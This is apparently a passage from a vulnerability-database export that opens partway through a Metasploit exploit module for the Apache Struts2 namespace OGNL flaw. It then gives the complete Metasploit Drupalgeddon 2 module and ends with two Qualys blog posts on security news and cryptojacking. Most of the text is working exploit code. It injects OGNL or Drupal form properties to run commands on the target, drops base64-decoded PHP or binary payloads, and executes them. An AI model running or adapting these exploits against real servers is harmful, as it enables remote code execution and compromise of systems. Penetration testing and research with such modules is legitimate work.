payload\")\n end\n\n payload = generate_payload_exe\n print_status(\"Generated #{payload.length} byte binary payload\")\n payload_b64 = [payload].pack(\"m\").delete(\"\\n\")\n\n if payload_b64.length < 8100\n send_payload_oneshot(payload_b64)\n else\n send_payload_multishot(payload)\n end\n end\n\n def send_payload_oneshot(payload)\n data_header = datastore['HEADER']\n if data_header.empty?\n fail_with(Failure::BadConfig, \"HEADER parameter cannot be blank when sending a payload\")\n end\n\n random_filename = datastore['TEMPFILE']\n\n # d = payload data\n # f = path to temp file\n # s = stream/handle to temp file\n ognl = \"\"\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\n ognl << %Q|(#d=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{data_header}')).|\n ognl << %Q|(#f=@java.io.File@createTempFile('#{random_filename}','.tmp')).|\n ognl << %q|(#f.setExecutable(true)).|\n ognl << %q|(#f.deleteOnExit()).|\n ognl << %q|(#s=new java.io.FileOutputStream(#f)).|\n ognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#d)).|\n ognl << %q|(#s.write(#d)).|\n #TODO: Consider GZIP: ognl << %q|(#s.write(java.util.zip.GZIPInputStream(#d).read())).|\n ognl << %q|(#s.close()).|\n ognl << %q|(#p=new java.lang.ProcessBuilder({#f.getAbsolutePath()})).|\n ognl << %q|(#p.start()).|\n ognl << %q|(#f.delete()).|\n\n success_string = rand_text_alpha(4)\n ognl << %Q|('#{success_string}')|\n\n r = send_struts_request(ognl, payload: payload)\n\n if r && r.headers && r.headers['Location'].split('/')[1] == success_string\n print_good(\"Payload successfully dropped and executed.\")\n elsif r && r.headers['Location']\n vprint_error(\"RESPONSE: \" + r.headers['Location'])\n fail_with(Failure::PayloadFailed, \"Target did not successfully execute the request\")\n elsif r && r.code == 400\n fail_with(Failure::UnexpectedReply, \"Target reported an unspecified error while executing the payload\")\n end\n end\n\n def ognl_create_file()\n filename = datastore['TEMPFILE']\n\n # f = path to temp file\n ognl = \"\"\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\n ognl << %Q|(#f=@java.io.File@createTempFile('#{filename}','.exe')).|\n ognl << %q|(#f.setExecutable(true)).|\n ognl << %q|(#f.deleteOnExit()).|\n ognl << %q|(#f)|\n\n r = send_struts_request(ognl)\n\n begin\n tempfile = r.headers['Location']\n tempfile = tempfile[1..-(2+datastore['ACTION'].length)]\n if tempfile.empty?\n fail_with(Failure::UnexpectedReply,\"Unable to create and locate file on target. Try a cmd/*/generic payload\")\n end\n rescue\n fail_with(Failure::UnexpectedReply,\"Unable to create and locate file. Try a cmd/*/generic payload\")\n end\n\n return tempfile\n end\n\n def send_payload_multishot(payload)\n tempfile = ognl_create_file()\n print_status(\"Temp file created: #{tempfile}\")\n\n payload_cursor = 0\n\n while payload_cursor < payload.length\n payload_size = rand(4500..5000) # payload_size cannot exceed 5645 in my testing\n payload_start = payload_cursor\n payload_end = payload_cursor + payload_size\n payload_end = payload.size if payload_end > payload.size\n\n chunk_bin = payload[payload_start..payload_end]\n chunk_b64 = [chunk_bin].pack(\"m\").delete(\"\\n\")\n print_status(\"Sending payload chunk: #{chunk_b64.length} bytes\")\n ognl_append_file(tempfile, chunk_b64)\n\n payload_cursor = payload_end + 1\n end\n\n ognl_execute(tempfile)\n end\n\n def ognl_append_file(payload_file, payload_chunk)\n data_header = datastore['HEADER'] + 'd'\n file_header = datastore['HEADER'] + 'f'\n headers = {\n \"#{data_header}\": payload_chunk,\n \"#{file_header}\": payload_file,\n }\n\n # d = payload data\n # f = path to temp file\n # s = stream/handle to temp file\n ognl = \"\"\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\n ognl << %Q|(#d=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{data_header}')).|\n ognl << %Q|(#f=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{file_header}')).|\n ognl << %q|(#s=new java.io.FileOutputStream(#f,1)).|\n ognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#d)).|\n ognl << %q|(#s.write(#d)).|\n ognl << %q|(#s.close()).|\n\n success_string = rand_text_alpha(4)\n ognl << %Q|('#{success_string}')|\n r = send_struts_request(ognl, headers: headers)\n\n begin\n if r.headers['Location'].include? success_string\n vprint_good(\"OGNL payload chunk sent successfully.\")\n return\n else\n fail_with(Failure::UnexpectedReply, \"OGNL payload upload did not respond\")\n end\n rescue\n fail_with(Failure::UnexpectedReply, \"OGNL payload upload failed\")\n end\n end\n\n def ognl_execute(file)\n file_header = datastore['HEADER'] + 'f'\n headers = {\n \"#{file_header}\": file,\n }\n\n # f = path to temp file\n # p = process handle\n ognl = \"\"\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\n ognl << %Q|(#f=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{file_header}')).|\n ognl << %q|(#p=new java.lang.ProcessBuilder(#f)).|\n ognl << %q|(#p.start()).|\n ognl << %q|(#f.delete()).|\n\n success_string = rand_text_alpha(4)\n ognl << %Q|('#{success_string}')|\n r = send_struts_request(ognl, headers: headers)\n\n begin\n if r.code==302\n print_good(\"OGNL payload executed successfully.\")\n else\n fail_with(Failure::PayloadFailed, \"Target did not successfully execute the request\")\n end\n rescue\n vprint_status(\"TARGET RESPONDED: #{r.to_s}\")\n fail_with(Failure::UnexpectedReply, \"Target reported an unspecified error while attempting to execute the payload\")\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/struts2_namespace_ognl.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-04-13T16:59:05", "description": "This module exploits a Drupal property injection in the Forms API. Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.\n", "cvss3": {}, "published": "2018-04-18T00:05:45", "type": "metasploit", "title": "Drupal Drupalgeddon 2 Forms API Property Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2023-04-04T09:24:09", "id": "MSF:EXPLOIT-UNIX-WEBAPP-DRUPAL_DRUPALGEDDON2-", "href": "https://www.rapid7.com/db/modules/exploit/unix/webapp/drupal_drupalgeddon2/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HTTP::Drupal\n # XXX: CmdStager can't handle badchars\n include Msf::Exploit::PhpEXE\n include Msf::Exploit::FileDropper\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Drupal Drupalgeddon 2 Forms API Property Injection',\n 'Description' => %q{\n This module exploits a Drupal property injection in the Forms API.\n\n Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.\n },\n 'Author' => [\n 'Jasper Mattsson', # Vulnerability discovery\n 'a2u', # Proof of concept (Drupal 8.x)\n 'Nixawk', # Proof of concept (Drupal 8.x)\n 'FireFart', # Proof of concept (Drupal 7.x)\n 'wvu' # Metasploit module\n ],\n 'References' => [\n ['CVE', '2018-7600'],\n ['URL', 'https://www.drupal.org/sa-core-2018-002'],\n ['URL', 'https://greysec.net/showthread.php?tid=2912'],\n ['URL', 'https://research.checkpoint.com/uncovering-drupalgeddon-2/'],\n ['URL', 'https://github.com/a2u/CVE-2018-7600'],\n ['URL', 'https://github.com/nixawk/labs/issues/19'],\n ['URL', 'https://github.com/FireFart/CVE-2018-7600']\n ],\n 'DisclosureDate' => '2018-03-28',\n 'License' => MSF_LICENSE,\n 'Platform' => ['php', 'unix', 'linux'],\n 'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Payload' => {'BadChars' => '&>\\''},\n 'Targets' => [\n #\n # Automatic targets (PHP, cmd/unix, native)\n #\n ['Automatic (PHP In-Memory)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Type' => :php_memory\n ],\n ['Automatic (PHP Dropper)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Type' => :php_dropper\n ],\n ['Automatic (Unix In-Memory)',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_memory\n ],\n ['Automatic (Linux Dropper)',\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper\n ],\n #\n # Drupal 7.x targets (PHP, cmd/unix, native)\n #\n ['Drupal 7.x (PHP In-Memory)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Version' => Rex::Version.new('7'),\n 'Type' => :php_memory\n ],\n ['Drupal 7.x (PHP Dropper)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Version' => Rex::Version.new('7'),\n 'Type' => :php_dropper\n ],\n ['Drupal 7.x (Unix In-Memory)',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Version' => Rex::Version.new('7'),\n 'Type' => :unix_memory\n ],\n ['Drupal 7.x (Linux Dropper)',\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Version' => Rex::Version.new('7'),\n 'Type' => :linux_dropper\n ],\n #\n # Drupal 8.x targets (PHP, cmd/unix, native)\n #\n ['Drupal 8.x (PHP In-Memory)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Version' => Rex::Version.new('8'),\n 'Type' => :php_memory\n ],\n ['Drupal 8.x (PHP Dropper)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Version' => Rex::Version.new('8'),\n 'Type' => :php_dropper\n ],\n ['Drupal 8.x (Unix In-Memory)',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Version' => Rex::Version.new('8'),\n 'Type' => :unix_memory\n ],\n ['Drupal 8.x (Linux Dropper)',\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Version' => Rex::Version.new('8'),\n 'Type' => :linux_dropper\n ]\n ],\n 'DefaultTarget' => 0, # Automatic (PHP In-Memory)\n 'DefaultOptions' => {'WfsDelay' => 2}, # Also seconds between attempts\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [],\n 'Reliability' => [],\n 'AKA' => ['SA-CORE-2018-002', 'Drupalgeddon 2']}\n ))\n\n register_options([\n OptString.new('PHP_FUNC', [true, 'PHP function to execute', 'passthru']),\n OptBool.new('DUMP_OUTPUT', [false, 'Dump payload command output', false])\n ])\n\n register_advanced_options([\n OptString.new('WritableDir', [true, 'Writable dir for droppers', '/tmp'])\n ])\n end\n\n def check\n checkcode = CheckCode::Unknown\n\n @version = target['Version'] || drupal_version\n\n unless @version\n vprint_error('Could not determine Drupal version to target')\n return checkcode\n end\n\n vprint_status(\"Drupal #{@version} targeted at #{full_uri}\")\n checkcode = CheckCode::Detected\n\n changelog = drupal_changelog(@version)\n\n unless changelog\n vprint_error('Could not determine Drupal patch level')\n return checkcode\n end\n\n case drupal_patch(changelog, 'SA-CORE-2018-002')\n when nil\n vprint_warning('CHANGELOG.txt no longer contains patch level')\n when true\n vprint_warning('Drupal appears patched in CHANGELOG.txt')\n checkcode = CheckCode::Safe\n when false\n vprint_good('Drupal appears unpatched in CHANGELOG.txt')\n checkcode = CheckCode::Appears\n end\n\n # NOTE: Exploiting the vuln will move us from \"Safe\" to Vulnerable\n token = rand_str\n res = execute_command(token, func: 'printf')\n\n return checkcode unless res\n\n if res.body.start_with?(token)\n vprint_good('Drupal is vulnerable to code execution')\n checkcode = CheckCode::Vulnerable\n end\n\n checkcode\n end\n\n def exploit\n unless @version\n print_warning('Targeting Drupal 7.x as a fallback')\n @version = Rex::Version.new('7')\n end\n\n if datastore['PAYLOAD'] == 'cmd/unix/generic'\n print_warning('Enabling DUMP_OUTPUT for cmd/unix/generic')\n # XXX: Naughty datastore modification\n datastore['DUMP_OUTPUT'] = true\n end\n\n # NOTE: assert() is attempted first, then PHP_FUNC if that fails\n case target['Type']\n when :php_memory\n execute_command(payload.encoded, func: 'assert')\n\n sleep(wfs_delay)\n return if session_created?\n\n # XXX: This will spawn a *very* obvious process\n execute_command(\"php -r '#{payload.encoded}'\")\n when :unix_memory\n execute_command(payload.encoded)\n when :php_dropper, :linux_dropper\n dropper_assert\n\n sleep(wfs_delay)\n return if session_created?\n\n dropper_exec\n end\n end\n\n def dropper_assert\n php_file = Pathname.new(\n \"#{datastore['WritableDir']}/#{rand_str}.php\"\n ).cleanpath\n\n # Return the PHP payload or a PHP binary dropper\n dropper = get_write_exec_payload(\n writable_path: datastore['WritableDir'],\n unlink_self: true # Worth a shot\n )\n\n # Encode away potential badchars with Base64\n dropper = Rex::Text.encode_base64(dropper)\n\n # Stage 1 decodes the PHP and writes it to disk\n stage1 = %Q{\n file_put_contents(\"#{php_file}\", base64_decode(\"#{dropper}\"));\n }\n\n # Stage 2 executes said PHP in-process\n stage2 = %Q{\n include_once(\"#{php_file}\");\n }\n\n # :unlink_self may not work, so let's make sure\n register_file_for_cleanup(php_file)\n\n # Hopefully pop our shell with assert()\n execute_command(stage1.strip, func: 'assert')\n execute_command(stage2.strip, func: 'assert')\n end\n\n def dropper_exec\n php_file = \"#{rand_str}.php\"\n tmp_file = Pathname.new(\n \"#{datastore['WritableDir']}/#{php_file}\"\n ).cleanpath\n\n # Return the PHP payload or a PHP binary dropper\n dropper = get_write_exec_payload(\n writable_path: datastore['WritableDir'],\n unlink_self: true # Worth a shot\n )\n\n # Encode away potential badchars with Base64\n dropper = Rex::Text.encode_base64(dropper)\n\n # :unlink_self may not work, so let's make sure\n register_file_for_cleanup(php_file)\n\n # Write the payload or dropper to disk (!)\n # NOTE: Analysis indicates > is a badchar for 8.x\n execute_command(\"echo #{dropper} | base64 -d | tee #{php_file}\")\n\n # Attempt in-process execution of our PHP script\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, php_file)\n )\n\n sleep(wfs_delay)\n return if session_created?\n\n # Try to get a shell with PHP CLI\n execute_command(\"php #{php_file}\")\n\n sleep(wfs_delay)\n return if session_created?\n\n register_file_for_cleanup(tmp_file)\n\n # Fall back on our temp file\n execute_command(\"echo #{dropper} | base64 -d | tee #{tmp_file}\")\n execute_command(\"php #{tmp_file}\")\n end\n\n def execute_command(cmd, opts = {})\n func = opts[:func] || datastore['PHP_FUNC'] || 'passthru'\n\n vprint_status(\"Executing with #{func}(): #{cmd}\")\n\n res =\n case @version.to_s\n when /^7\\b/\n exploit_drupal7(func, cmd)\n when /^8\\b/\n exploit_drupal8(func, cmd)\n end\n\n return unless res\n\n if res.code == 200\n print_line(res.body) if datastore['DUMP_OUTPUT']\n else\n print_error(\"Unexpected reply: #{res.inspect}\")\n end\n\n res\n end\n\n def exploit_drupal7(func, code)\n vars_get = {\n 'q' => 'user/password',\n 'name[#post_render][]' => func,\n 'name[#markup]' => code,\n 'name[#type]' => 'markup'\n }\n\n vars_post = {\n 'form_id' => 'user_pass',\n '_triggering_element_name' => 'name'\n }\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'vars_get' => vars_get,\n 'vars_post' => vars_post\n )\n\n return res unless res && res.code == 200\n\n form_build_id = res.get_html_document.at(\n '//input[@name = \"form_build_id\"]/@value'\n )\n\n return res unless form_build_id\n\n vars_get = {\n 'q' => \"file/ajax/name/#value/#{form_build_id.value}\"\n }\n\n vars_post = {\n 'form_build_id' => form_build_id.value\n }\n\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'vars_get' => vars_get,\n 'vars_post' => vars_post\n )\n end\n\n def exploit_drupal8(func, code)\n # Clean URLs are enabled by default and \"can't\" be disabled\n uri = normalize_uri(target_uri.path, 'user/register')\n\n vars_get = {\n 'element_parents' => 'account/mail/#value',\n 'ajax_form' => 1,\n '_wrapper_format' => 'drupal_ajax'\n }\n\n vars_post = {\n 'form_id' => 'user_register_form',\n '_drupal_ajax' => 1,\n 'mail[#type]' => 'markup',\n 'mail[#post_render][]' => func,\n 'mail[#markup]' => code\n }\n\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => uri,\n 'vars_get' => vars_get,\n 'vars_post' => vars_post\n )\n end\n\n def rand_str\n Rex::Text.rand_text_alphanumeric(8..42)\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/drupal_drupalgeddon2.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "qualysblog": [{"lastseen": "2019-01-14T20:46:20", "description": "Ransomware raids aimed at specific targets with big pockets. Another Struts vulnerability -- but scarier than last year\u2019s. An Android spyware that records your phone calls. These are some of the security news that have caught our attention.\n\n### New Struts Bug Should Be Patched Yesterday\n\nApache patched a serious remote code execution vulnerability ([CVE-2018-11776](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11776>)) affecting all supported versions -- 2.3 to 2.3.34 and 2.5 to 2.5.16 -- of the widely used Struts Java application framework. The bug is considered more dangerous than the one disclosed last year in Struts that was exploited in the massive data breach at Equifax.\n\nIn the Apache [security bulletin](<https://cwiki.apache.org/confluence/display/WW/S2-057>), the vulnerability is rated \u201cCritical\u201d and users are advised to immediately upgrade to Struts 2.3.35 or Struts 2.5.17.\n\nThe remote code execution becomes possible \u201cwhen using results with no namespace and in same time, its upper action(s) have no or wildcard namespace\u201d and \u201cwhen using url tag which doesn\u2019t have value and action set,\u201d the bulletin reads.\n\nOrganizations should upgrade to the patched Struts versions even if their applications aren\u2019t vulnerable to this bug. \u201cAn inadvertent change to a Struts configuration file may render the application vulnerable in the future,\u201d [stated](<https://semmle.com/news/apache-struts-CVE-2018-11776>) Semmle, whose security researcher Man Yue Mo discovered this vulnerability.\n\nUpgrading should take first priority, considering that Struts is widely used for public web apps, vulnerable systems are easy to identify, and the bug is easy to exploit, according to the company.\n\n\u201cA hacker can find their way in within minutes, and exfiltrate data or stage further attacks from the compromised system. It\u2019s crucially important to update affected systems immediately; to wait is to take an irresponsible risk,\u201d said Pavel Avgustinov, a Semmle VP.\n\nWriting in the Qualys blog, Product Management Director Jimmy Graham [noted](<https://blog.qualys.com/securitylabs/2018/08/23/detecting-apache-struts-2-namespace-rce-cve-2018-11776>) that the vulnerability does not exist with a default configuration of Struts, but that \u201cit does exist in commonly seen configurations for some Struts plugins.\u201d\n\n\u201cDue to the ease of exploitation and relatively common configuration that is required, this vulnerability should be patched immediately for all applications that use Struts 2,\u201d Graham wrote. Qualys has defined two QIDs to detect this vulnerability (QID 13251 and QID 371151), and created dynamic [dashboards](<https://community.qualys.com/docs/DOC-6515-dashboards-and-reporting-detecting-apache-struts-2-namespace-rce-cve-2018-11776?_ga=2.73902801.230834091.1535379602-620242525.1458325156>) to visualize it.\n\n\n\nGraham also describes how the Qualys Web Application Firewall (WAF) can mitigate the vulnerability.\n\nMore information:\n\n[Apache Struts 2 namespace Remote Code Execution Vulnerability: CVE-2018-11776](<https://threatprotect.qualys.com/2018/08/22/apache-struts-2-namespace-remote-code-execution-vulnerability-cve-2018-11776/?_ga=2.140995313.230834091.1535379602-620242525.1458325156>) _(Qualys)_\n\n[Apache Struts 2 Flaw Uncovered: \u2018More Critical Than Equifax Bug\u2019](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>) _(ThreatPost)_\n\n[Admins Urged: Stop Everything and Patch New Apache Struts Flaw](<https://www.infosecurity-magazine.com/news/admins-stop-everything-patch/>) _(InfoSecurity)_\n\n[Experts Urge Rapid Patching of \u2018Struts\u2019 Bug](<https://krebsonsecurity.com/2018/08/experts-urge-rapid-patching-of-struts-bug/>) _(Krebs on Security)_\n\n[PoC Code Surfaces to Exploit Apache Struts 2 Vulnerability](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) _(ThreatPost)_\n\n### Ransomware Campaign Attacks Selected Organizations\n\nCyber thieves recently began attacking handpicked corporations with ransomware and demanding skyhigh bitcoin payments.\n\nThe criminals are deliberately targeting specific large businesses, and they\u2019re using ransomware called Ryuk that\u2019s designed for tailored attacks. They reportedly netted more than $600,000 during the campaign\u2019s first two weeks.\n\n\u201cIts encryption scheme is intentionally built for small-scale operations, such that only crucial assets and resources are infected in each targeted network with its infection and distribution carried out manually by the attackers,\u201d CheckPoint researchers [wrote](<https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/>).\n\nThe implication is that prior to each attack, \u201cextensive network mapping, hacking and credential collection\u201d is conducted by the miscreants, believed to have ties to the notorious hacker collective Lazarus Group and be experienced in targeted attacks, according to the researchers.\n\nMore information:\n\n[This new ransomware campaign targets business and demands a massive bitcoin ransom](<https://www.zdnet.com/article/this-new-ransomware-campaign-targets-business-and-demands-a-massive-bitcoin-ransom/>) _(ZDnet)_\n\n[Ryuk Ransomware Emerges in Highly Targeted, Highly Lucrative Campaign](<https://threatpost.com/ryuk-ransomware-emerges-in-highly-targeted-highly-lucrative-campaign/136755/>) _(ThreatPost)_\n\n[Ryuk Ransomware Crew Makes $640,000 in Recent Activity Surge](<https://www.bleepingcomputer.com/news/security/ryuk-ransomware-crew-makes-640-000-in-recent-activity-surge/>) _(BleepingComputer)_\n\n### T-Mobile Hacked, Millions Affected\n\nPersonal information of 2 million T-Mobile customers, [including encrypted passwords](<https://motherboard.vice.com/en_us/article/a3qpk5/t-mobile-hack-data-breach-api-customer-data>), may have been accessed by hackers via a breached API on August 20.\n\nThe compromised data may have included names, billing zip codes, phone numbers, email addresses, and account numbers, but not financial information nor Social Security numbers, [according to the company](<https://www.t-mobile.com/customers/6305378821>). T-Mobile hasn\u2019t provided further details on the nature of the attack.\n\nOn related news, customer security PINs from T-Mobile and AT&amp;T were found to be accessible due to unrelated flaws in partners\u2019 websites, [according to BuzzFeed](<https://www.buzzfeednews.com/article/nicolenguyen/tmobile-att-account-pin-security-flaw-apple>). Apple\u2019s online store exposed the T-Mobile data, while the website of phone insurance company Asurion exposed AT&amp;T\u2019s data. Both companies fixed the flaws after being alerted to them.\n\nAccess to a mobile account PIN could let a hacker \u201ceasily commandeer your phone number and use it to trick the SMS-based authentication designed to verify your identity when you log on to your bank, email provider, or social media accounts,\u201d wrote Nicole Nguyen in BuzzFeed.\n\nMeanwhile, a security researcher was able to [enter a Sprint employee portal](<https://techcrunch.com/2018/08/25/hacker-accessed-sprint-portal-customer-data/>) protected by weak credentials, and said customer data could have been accessed.\n\nMore information:\n\n[Passwords Part of Data Breach, T-Mobile Admits: What to Do Now](<https://www.tomsguide.com/us/tmobile-breach-2018,news-27876.html>) _(Tom\u2019s Guide)_\n\n[Why T-Mobile's Data Breach Should Be a Wake-Up Call](<https://www.fool.com/investing/2018/08/27/why-t-mobiles-data-breach-should-be-a-wake-up-call.aspx>) _(Motley Fool)_\n\n[2 Million T-Mobile Customers Are Hit by a Data Breach](<https://www.consumerreports.org/privacy/2-million-t-mobile-customers-hit-by-data-breach/>) _(Consumer Reports)_\n\n[Security researchers found vulnerabilities at AT&amp;T, T-Mobile, and Sprint that could have exposed customer data](<https://www.theverge.com/2018/8/25/17781906/att-tmobile-sprint-security-vulnerabilities-customer-information>) _(The Verge)_\n\n[T-Mobile, AT&amp;T customer account PINs were exposed by website flaws](<https://www.engadget.com/2018/08/25/t-mobile-att-pin-vulnerability/>) _(Engadget)_\n\n### Android Malware Records Calls, Takes Videos\n\nMalware that infects Android devices and conducts extensive snooping has been discovered bundled in a malicious app that mimics a legitimate one.\n\nCalled Triout, the spyware stealthily can record phone calls, log incoming text messages, take videos, snap photos, collect location data and transmit everything it collects to a command and control center, [according to Bitdefender](<https://www.bitdefender.com/files/News/CaseStudies/study/234/Bitdefender-Whitepaper-Triout-The-Malware-Framework-for-Android-That-Packs-Potent-Spyware-Capabilities.pdf>), which discovered it.\n\n\u201cThe malware was first observed lurking in an app, repackaged to look identical to a legitimate Android app called \u2018Sex Game.\u2019 It was available in the Google Play store starting in 2016, but has since been removed,\u201d a ThreatPost [article](<https://threatpost.com/triout-malware-carries-out-extensive-targeted-android-surveillance/136773/>) reads.\n\nMore information:\n\n[Android 'Triout' spyware records calls, sends photos and text messages to attackers](<https://www.csoonline.com/article/3299700/security/android-triout-spyware-records-calls-sends-photos-and-text-messages-to-attackers.html>) _(CSO)_\n\n[This Android spyware records calls and sends your pictures and location to hackers](<https://www.zdnet.com/article/android-spyware-malware-records-calls-and-sends-your-pictures-to-hackers/>) _(ZDnet)_\n\n[New Android Triout Malware Can Record Phone Calls, Steal Pictures](<https://www.bleepingcomputer.com/news/security/new-android-triout-malware-can-record-phone-calls-steal-pictures/>) _(BleepingComputer)_\n\n### In Other News \u2026\n\n * Cyber thieves [stole](<https://cheddars.com/customer-notification/>) payment card information from Cheddar\u2019s Scratch Kitchen restaurants in 23 U.S. states for two months late last year, potentially affecting [almost 600,000 customers](<https://www.prnewswire.com/news-releases/notice-of-unauthorized-access-to-cheddars-scratch-kitchen-guest-data-300701161.html>).\n * Apple was hacked by a 16-year old Australian boy who told authorities he [dreamed of working](<https://hotforsecurity.bitdefender.com/blog/apple-hacked-by-16-year-old-who-dreamed-of-working-for-firm-20254.html>) at the company.\n * Adobe issued [out-of-band fixes](<https://helpx.adobe.com/security/products/photoshop/apsb18-28.html>) for remote code execution vulnerabilities in Photoshop CC, barely a week after its scheduled monthly set of patches.\n * Spyfone, a company that lets parents and employers monitor mobile devices, left an AWS S3 storage bucket unprotected, [exposing all manner of personal data](<https://motherboard.vice.com/amp/en_us/article/9kmj4v/spyware-company-spyfone-terabytes-data-exposed-online-leak>) from thousands of customers.", "cvss3": {}, "published": "2018-08-27T18:32:33", "type": "qualysblog", "title": "Security News: Hackers Aim Ransomware at Big Cos., as Experts Call for Swift Patching of Struts Bug", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-27T18:32:33", "id": "QUALYSBLOG:5E5409E093DE06FE967B988870D82540", "href": "https://blog.qualys.com/news/2018/08/27/security-news-hackers-aim-ransomware-at-big-cos-as-experts-call-for-swift-patching-of-struts-bug", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-14T20:46:20", "description": "[](<https://chrome.google.com/webstore/detail/qualys-browsercheck-coinb/jdocohkgkgpminecekdnkoljcffebkgc>)Qualys Malware Research Labs is announcing the release of [Qualys BrowserCheck CoinBlocker](<https://chrome.google.com/webstore/detail/qualys-browsercheck-coinb/jdocohkgkgpminecekdnkoljcffebkgc>) Chrome extension to detect and block browser-based cryptocurrency mining, aka _cryptojacking_.\n\n### Cryptojacking\n\nCryptojacking attacks leverage the victim system\u2019s resources via malicious JavaScript to mine certain cryptocurrencies. Attackers carry out these attacks by infecting popular sites with JavaScript that enables cryptojacking. Any visitor to such sites will download the JavaScript and unknowingly contribute its system resources to mine a cryptocurrency that is added to the attacker\u2019s wallet. The resource-intensive mining process is carried out on victim systems typically consumes more than 70% of CPU, that reduces system performance, increases power consumption and can cause possible permanent damage to the system.\n\nBecause cryptojacking helps attackers earn cryptocurrency without spending a dime on mining infrastructure, it is very profitable. The overall cryptocurrency market capitalization has reached more than $270 billion as of July 2018 with more than 1700 active projects! There is a lot of money to be made for attackers leveraging these projects, and cryptomining is gradually moving to the center stage of threat landscape as an even more attractive option compared to the recent favorite ransomware campaigns.\n\nCryptojacking has also gone mainstream recently because it is safer for cyber criminals and webmasters than ransomware, which requires interaction with the victim to collect payment. And because cryptojacking is browser based, it is easier to infect victims than hacking into servers. As cryptomining becomes more resource-intensive over time in terms of compute power and electricity consumption required, stealing those resources is becoming more enticing to attackers.\n\n### Cryptojacking and Monero\n\n[Monero (XMR)](<https://en.wikipedia.org/wiki/Monero_\\(cryptocurrency\\)>), a relatively new cryptocurrency, is becoming a more common target of cryptojacking attackers because its mining algorithm ([CryptoNight](<https://en.wikipedia.org/wiki/CryptoNote#Egalitarian_proof_of_work>)) is designed for easy integration and because its privacy and anonymity features also benefit hackers. Monero\u2019s proof-of-work mining algorithm can be used with desktop- or server-grade CPUs rather than custom-built specialized ASIC or GPU hardware that is required for traditional coin mining algorithms. This is an important aspect of new generation cryptocurrency, as it tries to be decentralized and avoid enabling a small set of users with access to specialized hardware from creating a mining monopoly. From an attacker\u2019s standpoint, the possibility of making sizable profits off desktop-grade CPUs with added privacy is a lucrative option.\n\nA popular technology used in most browser based cryptocurrency mining algorithms is WASM, short for WebAssembly. It is a binary executable format for the web that makes JavaScript execution within the browser quite efficient.\n\n\n\n_Fig. 1 CryptoNight based cryptocurrencies market capitalization, June 2018. Source: <https://coinmarketcap.com>_\n\n \n\n### Infections\n\nThe security research blog [Bad Packet Reports](<https://badpackets.net/>) recently published an [article](<https://badpackets.net/over-100000-drupal-websites-vulnerable-to-drupalgeddon-2-cve-2018-7600/>) that stated the presence of more than 100,000 sites that are currently infected with cryptojacking malware. Most of these sites seem to be compromised using an exploit for the [Drupalgeddon 2](<https://www.drupal.org/forum/newsletters/security-advisories-for-drupal-core/2014-10-15/sa-core-2014-005-drupal-core-sql>). The attack exploits the vulnerability [CVE-2018-7600](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>), even after the [patch](<https://www.drupal.org/files/issues/SA-CORE-2014-005-D7.patch>) has been available for several months already. [Side note: Always patch regularly!] There are reports of malware campaigns leveraging a recently released exploit for this 